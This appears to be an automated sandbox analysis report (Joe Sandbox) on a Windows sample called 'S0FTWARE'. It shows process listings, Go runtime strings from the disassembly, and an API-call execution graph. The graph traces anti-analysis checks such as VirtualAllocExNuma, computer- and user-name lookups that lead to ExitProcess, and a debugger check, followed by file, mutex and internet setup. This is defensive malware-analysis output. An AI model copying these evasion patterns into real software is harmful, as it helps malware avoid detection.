                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                                                  Start time:09:48:34
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7088 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                                                  Start time:09:48:34
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5220 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                                    Function 00AD15C0 Relevance: 11.4, Strings: 9, Instructions: 172COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • CreateWaitableTimerEx when creating timer failedTime.MarshalJSON: year outside of range [0,9999]Time.MarshalText: year outside of range [0,9999]bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallcrypto/elliptic: fai, xrefs: 00AD1880
                                                                                                                                                                                                                                                                                                                    • VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer, xrefs: 00AD1825
                                                                                                                                                                                                                                                                                                                    • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00AD17F1
                                                                                                                                                                                                                                                                                                                    • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait reasonwinmm.dll not, xrefs: 00AD175B
                                                                                                                                                                                                                                                                                                                    • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definit, xrefs: 00AD18A7
                                                                                                                                                                                                                                                                                                                    • %, xrefs: 00AD18E4
                                                                                                                                                                                                                                                                                                                    • bad g0 stackbad recoveryblacksquare;caller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifycontent-typecontext.TODOcurlyeqprec;curlyeqsucc;decode arraydecode slicediamondsuit;dumping heapempty numberend tracegcentersyscalleqslantl, xrefs: 00AD17CA
                                                                                                                                                                                                                                                                                                                    • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definition of NAFx509: IP constraint contained inval, xrefs: 00AD184C
                                                                                                                                                                                                                                                                                                                    • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)v, xrefs: 00AD18DB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1624821709.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1624290182.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625261200.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625726706.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625784708.0000000000F67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625871593.0000000000F95000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625916005.0000000000F96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625962207.0000000000F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626026689.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626077624.0000000000F9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626111978.0000000000F9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FDD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626436063.0000000000FE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626524387.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626524387.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_S0FTWARE.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: %$CreateWaitableTimerEx when creating timer failedTime.MarshalJSON: year outside of range [0,9999]Time.MarshalText: year outside of range [0,9999]bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallcrypto/elliptic: fai$VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer$bad g0 stackbad recoveryblacksquare;caller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifycontent-typecontext.TODOcurlyeqprec;curlyeqsucc;decode arraydecode slicediamondsuit;dumping heapempty numberend tracegcentersyscalleqslantl$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definit$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)v$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definition of NAFx509: IP constraint contained inval$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait reasonwinmm.dll not
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3857051934
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aae15fd4fcaf50e564627e1c1f6bdae650b110e6b2576a401f3adc162289a222
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 284166abace735753ca11251f72d31e2a5708207c13ca335893a4ca430ad5ad0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aae15fd4fcaf50e564627e1c1f6bdae650b110e6b2576a401f3adc162289a222
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE81C0B45097059FD300EF64C29575ABBE0BF88704F00892EF48A8B392E7B4D949DF62
                                                                                                                                                                                                                                                                                                                    Function 00AE0D00 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoken is, xrefs: 00AE0E51
                                                                                                                                                                                                                                                                                                                    • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinespreadMethodspreadmethodstdDeviationstddeviationstraightphi;succcurlyeq;succnapprox;sun_eu_greeksurfaceScalesurfacescalesweepWaitersthickapprox;tls10defaulttraceStringstransmit, xrefs: 00AE0D99
                                                                                                                                                                                                                                                                                                                    • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestBernoullis;BoundIm, xrefs: 00AE0E07
                                                                                                                                                                                                                                                                                                                    • m->p= max= min= next= null p->m= prev= span=% util%%%02x%s: %s%v: %s(...), i = , not , val .reloc390625<-chanAElig;AacuteAcirc;AgraveAlpha;Amacr;AnswerAogon;ArabicAring;AtildeAugustBrahmiBreve;CANCELCarianCcedilCcirc;ChakmaColon;CommonCopticCross;DaggerDa, xrefs: 00AE0DBB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1624821709.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1624290182.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625261200.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625726706.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625784708.0000000000F67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625871593.0000000000F95000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625916005.0000000000F96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1625962207.0000000000F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626026689.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626077624.0000000000F9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626111978.0000000000F9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626166937.0000000000FDD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626436063.0000000000FE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626524387.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1626524387.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_S0FTWARE.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: m->p= max= min= next= null p->m= prev= span=% util%%%02x%s: %s%v: %s(...), i = , not , val .reloc390625<-chanAElig;AacuteAcirc;AgraveAlpha;Amacr;AnswerAogon;ArabicAring;AtildeAugustBrahmiBreve;CANCELCarianCcedilCcirc;ChakmaColon;CommonCopticCross;DaggerDa$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestBernoullis;BoundIm$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoken is$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinespreadMethodspreadmethodstdDeviationstddeviationstraightphi;succcurlyeq;succnapprox;sun_eu_greeksurfaceScalesurfacescalesweepWaitersthickapprox;tls10defaulttraceStringstransmit
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2005891860
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2f57faa167a52eeb23b4750f53b99bb820b313c32728eae394241b55e02c669b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 94027ff4e524aefd3417b396aa125b1d22e764eb4bb77135d12d5c2d98415bdb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f57faa167a52eeb23b4750f53b99bb820b313c32728eae394241b55e02c669b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B731F5B4508745CFD304EF64C295B5ABBE0BF88704F05896EE8998B352D774D888DFA2

                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                    Execution Coverage:4.8%
                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                    Signature Coverage:4.3%
                                                                                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                                                                    execution_graph 72623 8f9c8d 72624 8f9c8f 72623->72624 72674 8e2b58 72624->72674 72633 8e1274 25 API calls 72634 8f9cbe 72633->72634 72635 8e1274 25 API calls 72634->72635 72636 8f9cc8 72635->72636 72789 8e147a GetPEB 72636->72789 72638 8f9cd2 72639 8e1274 25 API calls 72638->72639 72640 8f9cdc 72639->72640 72641 8e1274 25 API calls 72640->72641 72642 8f9ce6 72641->72642 72643 8e1274 25 API calls 72642->72643 72644 8f9cf0 72643->72644 72790 8e1492 GetPEB 72644->72790 72646 8f9cfa 72647 8e1274 25 API calls 72646->72647 72648 8f9d04 72647->72648 72649 8e1274 25 API calls 72648->72649 72650 8f9d0e 72649->72650 72651 8e1274 25 API calls 72650->72651 72652 8f9d18 72651->72652 72791 8e14e9 72652->72791 72655 8e1274 25 API calls 72656 8f9d2c 72655->72656 72657 8e1274 25 API calls 72656->72657 72658 8f9d36 72657->72658 72659 8e1274 25 API calls 72658->72659 72660 8f9d40 72659->72660 72814 8e1656 GetTempPathW 72660->72814 72663 8e1274 25 API calls 72664 8f9d4f 72663->72664 72665 8e1274 25 API calls 72664->72665 72666 8f9d59 72665->72666 72667 8e1274 25 API calls 72666->72667 72668 8f9d63 72667->72668 72826 8f8f92 72668->72826 73054 8e470c GetProcessHeap RtlAllocateHeap 72674->73054 72677 8e470c 3 API calls 72678 8e2b80 72677->72678 72679 8e470c 3 API calls 72678->72679 72680 8e2b98 72679->72680 72681 8e470c 3 API calls 72680->72681 72682 8e2bae 72681->72682 72683 8e470c 3 API calls 72682->72683 72684 8e2bc4 72683->72684 72685 8e470c 3 API calls 72684->72685 72686 8e2bd9 72685->72686 72687 8e470c 3 API calls 72686->72687 72688 8e2bf2 72687->72688 72689 8e470c 3 API calls 72688->72689 72690 8e2c08 72689->72690 72691 8e470c 3 API calls 72690->72691 72692 8e2c1e 72691->72692 72693 8e470c 3 API calls 72692->72693 72694 8e2c34 72693->72694 72695 8e470c 3 API calls 72694->72695 72696 8e2c4a 72695->72696 72697 8e470c 3 API calls 72696->72697 72698 8e2c60 72697->72698 72699 8e470c 3 API calls 72698->72699 72700 8e2c78 72699->72700 72701 8e470c 3 API calls 72700->72701 72702 8e2c8e 72701->72702 72703 8e470c 3 API calls 72702->72703 72704 8e2ca4 72703->72704 72705 8e470c 3 API calls 72704->72705 72706 8e2cba 72705->72706 72707 8e470c 3 API calls 72706->72707 72708 8e2cd0 72707->72708 72709 8e470c 3 API calls 72708->72709 72710 8e2ce6 72709->72710 72711 8e470c 3 API calls 72710->72711 72712 8e2cff 72711->72712 72713 8e470c 3 API calls 72712->72713 72714 8e2d15 72713->72714 72715 8e470c 3 API calls 72714->72715 72716 8e2d2b 72715->72716 72717 8e470c 3 API calls 72716->72717 72718 8e2d41 72717->72718 72719 8e470c 3 API calls 72718->72719 72720 8e2d57 72719->72720 72721 8e470c 3 API calls 72720->72721 72722 8e2d6c 72721->72722 72723 8e470c 3 API calls 72722->72723 72724 8e2d85 72723->72724 72725 8e470c 3 API calls 72724->72725 72726 8e2d9b 72725->72726 72727 8e470c 3 API calls 72726->72727 72728 8e2db1 72727->72728 72729 8e470c 3 API calls 72728->72729 72730 8e2dc7 72729->72730 72731 8e470c 3 API calls 72730->72731 72732 8e2ddc 72731->72732 72733 8e470c 3 API calls 72732->72733 72734 8e2df2 72733->72734 72735 8e470c 3 API calls 72734->72735 72736 8e2e0b 72735->72736 72737 8e470c 3 API calls 72736->72737 72738 8e2e21 72737->72738 72739 8e470c 3 API calls 72738->72739 72740 8e2e37 72739->72740 72741 8e470c 3 API calls 72740->72741 72742 8e2e4d 72741->72742 72743 8e470c 3 API calls 72742->72743 72744 8e2e63 72743->72744 72745 8e470c 3 API calls 72744->72745 72746 8e2e78 72745->72746 72747 8e470c 3 API calls 72746->72747 72748 8e2e91 72747->72748 72749 8e470c 3 API calls 72748->72749 72750 8e2ea7 72749->72750 72751 8e470c 3 API calls 72750->72751 72752 8e2ebd 72751->72752 72753 8e470c 3 API calls 72752->72753 72754 8e2ed3 72753->72754 72755 8f9e25 72754->72755 73058 8f9d79 GetPEB 72755->73058 72757 8f9e2b 72758 8f9e3b 72757->72758 72759 8fa026 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 72757->72759 72768 8f9e55 20 API calls 72758->72768 72760 8fa097 72759->72760 72761 8fa085 GetProcAddress 72759->72761 72762 8fa0c9 72760->72762 72763 8fa0a0 GetProcAddress GetProcAddress 72760->72763 72761->72760 72764 8fa0e4 72762->72764 72765 8fa0d2 GetProcAddress 72762->72765 72763->72762 72766 8fa0ff 72764->72766 72767 8fa0ed GetProcAddress 72764->72767 72765->72764 72769 8fa108 GetProcAddress GetProcAddress 72766->72769 72770 8f9ca0 72766->72770 72767->72766 72768->72759 72769->72770 72771 8e10e0 GetCurrentProcess VirtualAllocExNuma 72770->72771 72772 8e1088 VirtualAlloc 72771->72772 72773 8e1101 ExitProcess 72771->72773 72776 8e10a8 _memset 72772->72776 72775 8e10dc 72778 8e1274 72775->72778 72776->72775 72777 8e10c5 VirtualFree 72776->72777 72777->72775 72779 8e129c _memset 72778->72779 72780 8e12ab 13 API calls 72779->72780 73059 8f28e1 GetProcessHeap RtlAllocateHeap GetComputerNameA 72780->73059 72783 8e13d9 73061 8fe88c 72783->73061 72786 8e13a9 72786->72783 72788 8e13d2 ExitProcess 72786->72788 72787 8e13e4 72787->72633 72789->72638 72790->72646 73071 8e149d GetPEB 72791->73071 72794 8e149d 2 API calls 72795 8e1506 72794->72795 72796 8e149d 2 API calls 72795->72796 72813 8e1591 72795->72813 72797 8e1519 72796->72797 72798 8e149d 2 API calls 72797->72798 72797->72813 72799 8e1528 72798->72799 72800 8e149d 2 API calls 72799->72800 72799->72813 72801 8e1537 72800->72801 72802 8e149d 2 API calls 72801->72802 72801->72813 72803 8e1546 72802->72803 72804 8e149d 2 API calls 72803->72804 72803->72813 72805 8e1555 72804->72805 72806 8e149d 2 API calls 72805->72806 72805->72813 72807 8e1564 72806->72807 72808 8e149d 2 API calls 72807->72808 72807->72813 72809 8e1573 72808->72809 72810 8e149d 2 API calls 72809->72810 72809->72813 72811 8e1582 72810->72811 72812 8e149d 2 API calls 72811->72812 72811->72813 72812->72813 72813->72655 72815 8e17e7 72814->72815 72816 8e1694 wsprintfW 72814->72816 72818 8fe88c ___crtMessageBoxW 5 API calls 72815->72818 72817 8e16c0 CreateFileW 72816->72817 72817->72815 72819 8e16eb GetProcessHeap RtlAllocateHeap _time64 srand rand 72817->72819 72820 8e17f7 72818->72820 72824 8e1744 _memset 72819->72824 72820->72663 72821 8e1723 WriteFile 72821->72815 72821->72824 72822 8e1758 CloseHandle CreateFileW 72822->72815 72823 8e178e ReadFile 72822->72823 72823->72815 72823->72824 72824->72815 72824->72821 72824->72822 72825 8e17b3 GetProcessHeap RtlFreeHeap CloseHandle 72824->72825 72825->72815 72825->72817 72827 8f8fa2 72826->72827 73075 8f2143 72827->73075 72831 8f8fc6 73080 8f2265 lstrlen 72831->73080 72834 8f2265 3 API calls 72835 8f8fe2 72834->72835 73084 8f21e9 72835->73084 72837 8f8feb 72838 8f900d OpenEventA 72837->72838 72839 8f901d CreateEventA 72838->72839 72840 8f9006 CloseHandle 72838->72840 72841 8f2143 lstrcpy 72839->72841 72840->72838 72842 8f9042 72841->72842 73088 8f21a5 lstrlen 72842->73088 72845 8f21a5 2 API calls 72846 8f90a9 72845->72846 73092 8e2edf 72846->73092 72849 8fa132 121 API calls 72850 8f91dc 72849->72850 73647 8f38a6 72850->73647 72853 8f21e9 lstrcpy 72854 8f91f1 72853->72854 72855 8f2143 lstrcpy 72854->72855 72856 8f9208 72855->72856 72857 8f2265 3 API calls 72856->72857 72858 8f921b 72857->72858 73655 8f2223 72858->73655 72861 8f21e9 lstrcpy 72862 8f9231 72861->72862 72863 8f9243 CreateDirectoryA 72862->72863 73659 8e1ced 72863->73659 72867 8f926d 73743 8f9a28 72867->73743 72869 8f927e 72870 8f21e9 lstrcpy 72869->72870 72871 8f9295 72870->72871 72872 8f21e9 lstrcpy 72871->72872 72873 8f92a5 72872->72873 73750 8f2175 72873->73750 72876 8f2265 3 API calls 72877 8f92c4 72876->72877 72878 8f21e9 lstrcpy 72877->72878 72879 8f92cd 72878->72879 72880 8f2223 2 API calls 72879->72880 72881 8f92ea 72880->72881 72882 8f21e9 lstrcpy 72881->72882 72883 8f92f3 72882->72883 72884 8f92fc InternetOpenA InternetOpenA 72883->72884 72885 8f2175 lstrcpy 72884->72885 72886 8f933a 72885->72886 72887 8f2143 lstrcpy 72886->72887 72888 8f9349 72887->72888 73754 8f25fe GetWindowsDirectoryA 72888->73754 72891 8f2175 lstrcpy 72892 8f9364 72891->72892 73772 8e4a56 72892->73772 72896 8f9377 72897 8f2143 lstrcpy 72896->72897 72898 8f93a4 72897->72898 72899 8e1ced lstrcpy 72898->72899 72900 8f93b5 72899->72900 73922 8e5e61 72900->73922 72904 8f93d4 72905 8f2143 lstrcpy 72904->72905 72906 8f93e7 72905->72906 72907 8e1ced lstrcpy 72906->72907 72908 8f93f8 72907->72908 72909 8e5e61 40 API calls 72908->72909 72910 8f9404 72909->72910 74096 8f4ea7 strtok_s 72910->74096 72912 8f9417 72913 8f2143 lstrcpy 72912->72913 72914 8f942a 72913->72914 72915 8e1ced lstrcpy 72914->72915 72916 8f943b 72915->72916 72917 8e5e61 40 API calls 72916->72917 72918 8f9447 72917->72918 74105 8f4fdf strtok_s 72918->74105 72920 8f945a 72921 8e1ced lstrcpy 72920->72921 72922 8f946b 72921->72922 74112 8f58c3 72922->74112 72924 8f9470 72925 8f2175 lstrcpy 72924->72925 72926 8f947e 72925->72926 72927 8f2143 lstrcpy 72926->72927 72928 8f948c 72927->72928 74450 8e515f 72928->74450 72931 8e1ced lstrcpy 72932 8f94a8 72931->72932 74469 8efabd 72932->74469 73055 8e2b6a 73054->73055 73056 8e4734 lstrlen 73054->73056 73055->72677 73056->73055 73058->72757 73060 8e1375 73059->73060 73060->72783 73069 8f28af GetProcessHeap RtlAllocateHeap GetUserNameA 73060->73069 73062 8fe896 IsDebuggerPresent 73061->73062 73063 8fe894 73061->73063 73070 8ff1f5 73062->73070 73063->72787 73066 8fecd6 SetUnhandledExceptionFilter UnhandledExceptionFilter 73067 8fecfb GetCurrentProcess TerminateProcess 73066->73067 73068 8fecf3 __call_reportfault 73066->73068 73067->72787 73068->73067 73069->72786 73070->73066 73072 8e14d9 73071->73072 73073 8e14c9 lstrcmpiW 73072->73073 73074 8e14df 73072->73074 73073->73072 73073->73074 73074->72794 73074->72813 73076 8f214e 73075->73076 73077 8f216f 73076->73077 73078 8f2165 lstrcpy 73076->73078 73079 8f28af GetProcessHeap RtlAllocateHeap GetUserNameA 73077->73079 73078->73077 73079->72831 73082 8f228c 73080->73082 73081 8f22b2 73081->72834 73082->73081 73083 8f229f lstrcpy lstrcat 73082->73083 73083->73081 73085 8f21f8 73084->73085 73086 8f221f 73085->73086 73087 8f2217 lstrcpy 73085->73087 73086->72837 73087->73086 73089 8f21ba 73088->73089 73090 8f21e3 73089->73090 73091 8f21d9 lstrcpy 73089->73091 73090->72845 73091->73090 73093 8e470c 3 API calls 73092->73093 73094 8e2ef3 73093->73094 73095 8e470c 3 API calls 73094->73095 73096 8e2f09 73095->73096 73097 8e470c 3 API calls 73096->73097 73098 8e2f1f 73097->73098 73099 8e470c 3 API calls 73098->73099 73100 8e2f37 73099->73100 73101 8e470c 3 API calls 73100->73101 73102 8e2f4f 73101->73102 73103 8e470c 3 API calls 73102->73103 73104 8e2f65 73103->73104 73105 8e470c 3 API calls 73104->73105 73106 8e2f7e 73105->73106 73107 8e470c 3 API calls 73106->73107 73108 8e2f94 73107->73108 73109 8e470c 3 API calls 73108->73109 73110 8e2faa 73109->73110 73111 8e470c 3 API calls 73110->73111 73112 8e2fc0 73111->73112 73113 8e470c 3 API calls 73112->73113 73114 8e2fd5 